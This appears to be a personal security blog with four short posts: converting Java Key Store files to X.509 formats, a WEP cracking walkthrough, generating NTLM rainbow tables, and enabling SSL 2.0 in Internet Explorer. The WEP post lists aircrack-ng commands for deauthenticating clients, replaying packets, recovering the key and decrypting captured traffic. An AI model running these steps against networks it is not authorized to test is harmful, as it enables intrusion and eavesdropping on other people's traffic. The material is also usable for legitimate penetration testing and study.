Converting Java Key Store into X.509 certificates


Web services security has been very much talked about in the recent times. Especially, with the Service Oriented Architecture (SOA) gaining increasing importance. One of the interesting ways to protect these web services encapsulated in SOAP (Simple Object Access Protocol) is using digital client-side authentication certificates. Programmers typically use Java Key Store (.JKS) files to establish connectivity to these applications. However, if we want to create a custom client using some scripting it creates an issue as we tend to use languages such as perl, bash, etc. to create connectivity. So I ran into this excellent tool called KeyTool IUI. This tool helps you import the Java Key Store (Tools -> Keystore Manager -> JKS Keystore) and export it in the PKCS#12, X.509 PEM, and DER formats. You can further use OpenSSL to change the formats as you please or separate out the components of the certificates.
You could even take these certificates in X.509 or PFX formats and convert into JCEKS, JKS formats! Pretty cool huh? 🙂 Nice software!


WEP Cracking


If you want to crack WEP keys of an AP that is using WEP.

The following steps should be performed:

Start Capturing packets first:
sudo airodump-ng –bssid <APMAC> -w <CAPTUREFILE> –channel <CHANNELNUM> <IFACE>

Start capturing ARP packets:
sudo aireplay-ng –arpreplay -e <ESSID> -b <APMAC> -h <ASSOCIATEDCLIENTMAC> <IFACE>

Send deauth packets:
sudo aireplay-ng –deauth 5 -a <APMAC> -c <ASSOCIATEDCLIENTMAC> -e <ESSID> <IFACE>

Send fakeauth packets:
sudo aireplay-ng –fakeauth 5 -e <ESSID> -b <APMAC> -h <ASSOCCLIENTMAC> <IFACE>

Cracking WEP:

The fudge factor is a measure of how much randomness to check for. I am not exactly sure of its cryptographic significance, however, it may make the difference between cracking a WEP key and not.

Sometimes you may have an AP with no clients connected to it. In such cases, follow the instructions at the following URL:
How to crack WEP with no clients.

Once the WEP keys are obtained then use airdecap-ng to decrypt the packets:
airdecap-ng -b <APMAC> -e <ESSID> -w <KEY> <PCAPFILE>
tcpdump -r <PCAPFILE>-dec.cap


NTLM Rainbow Tables generation


What www.hak5.org started was quite commendable and I’m really not sure what the status of the Community Rainbow Tables project is at hak5.
They are generating the rainbow tables with the following configuration:

* mixalpha-numeric-all-space
* [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
* 26 indexes, 22 files/index
* 572 tables total
* 340.93GB
* 96.07% probability of successful crack

I’m currently generating index 13 and index 26 on this configuration. It would be cool to have multiple people generate it and upload it. I know many people are already doing that as we speak. We should also have SHA1, MD5 project for mixalpha-numberic-all-space configurations.


SSL v2.0 on Internet Explorer

Now that Firefox 2.0 does not have option to enable SSL v2.0, there’s one way it can still be activated in Internet Explorer. Goto Tools -> Internet Options -> Advanced as shown in the screenshot and uncheck all other ciphers except SSL 2.0 and you should be able to check if a particular website supports SSL v2.0.

Activating SSL 2.0 in IE